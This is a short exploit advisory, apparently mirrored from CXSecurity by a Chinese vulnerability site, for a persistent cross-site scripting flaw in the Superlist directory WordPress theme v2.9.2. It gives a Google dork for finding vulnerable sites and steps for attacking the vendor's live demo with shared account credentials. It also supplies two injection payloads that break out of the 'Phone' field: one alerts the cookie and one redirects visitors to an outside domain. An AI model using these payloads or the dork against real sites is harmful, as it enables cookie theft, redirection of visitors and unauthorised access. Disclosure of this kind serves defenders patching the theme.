Superlist - Directory WordPress Theme v2.9.2 Persistent XSS - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1844420 漏洞类型
发布时间 2019-12-02 更新时间 2019-12-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120005
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Superlist - Directory WordPress Theme v2.9.2 Persistent XSS
# Google Dork: /wp-content/themes/superlist/
# Date: 02/12/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://byaviators.com/en/
# Software Link: https://themeforest.net/item/superlist-directory-wordpress-theme/13507181
# Version: 2.9.2 [ 2.880 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own here https://superlist.byaviators.com/create/?type=job or use mine: subversa/subversa), then go to the https://superlist.byaviators.com/create/?type=job&step=contact page for new listing submit right on the «Contact» step. You'll see the vulnerable input fields, f.e. «Phone». Use payload like provided below and save your listing. The point is, you need to «break» the «Phone» <a> tag and inject desired payload inside it. All data from the form steps is stored as a cookie.

Payload Sample #0: " /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);"
Payload Sample #1: " /onmouseover="console.log(`SUBVΞRSΛ`);" /onauxclick="alert(`PoC`);window.location.replace(`http://defcon.su`);"